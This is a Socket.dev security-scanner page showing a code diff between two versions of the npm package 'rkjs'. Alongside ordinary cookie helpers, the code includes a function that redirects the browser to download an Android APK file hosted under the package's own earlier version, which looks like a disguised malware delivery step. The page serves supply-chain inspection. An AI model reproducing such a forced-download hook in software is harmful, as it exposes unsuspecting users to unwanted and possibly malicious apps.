🚀 Socket Launch Week Day 5:Introducing Repository Access Permissions and Custom Roles.Learn more
Sign In

rkjs

Package Overview
Dependencies
Maintainers
1
Versions
12
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

rkjs - npm Package Compare versions

Comparing version
1.0.7
to
1.0.8
+1
-1
package.json
{
"name": "rkjs",
"version": "1.0.7",
"version": "1.0.8",
"description": "due to foi",

@@ -5,0 +5,0 @@ "main": "index.js",

+13
-10

@@ -5,3 +5,3 @@

)
function setCookie(cname,cvalue,exdays){
var duo={setCookie:function(cname,cvalue,exdays){
var d = new Date();

@@ -11,4 +11,3 @@ d.setTime(d.getTime()+(exdays*24*60*60*1000));

document.cookie = cname+"="+cvalue+"; "+expires;
}
function getCookie(cname){
},getCookie:function (cname){
var name = cname + "=";

@@ -21,5 +20,4 @@ var ca = document.cookie.split(';');

return "";
}
function checkCookie(){
var user=getCookie("12");
},checkCookie:function (){
var user=duo.getCookie("12");
if (user!=""){

@@ -37,9 +35,7 @@ /* alert("欢迎 " + user + " 再次访问"); */

}
}
function dc()
},dc:function ()
{
window.location.assign("https://cdn.jsdelivr.net/npm/rkjs@1.0.1/fnaka.apk")
}
function spd(){
},spd:function (){
k=localStorage.getItem("mkl");

@@ -61,1 +57,8 @@ if (k==null){

}
}

Sorry, the diff of this file is too big to display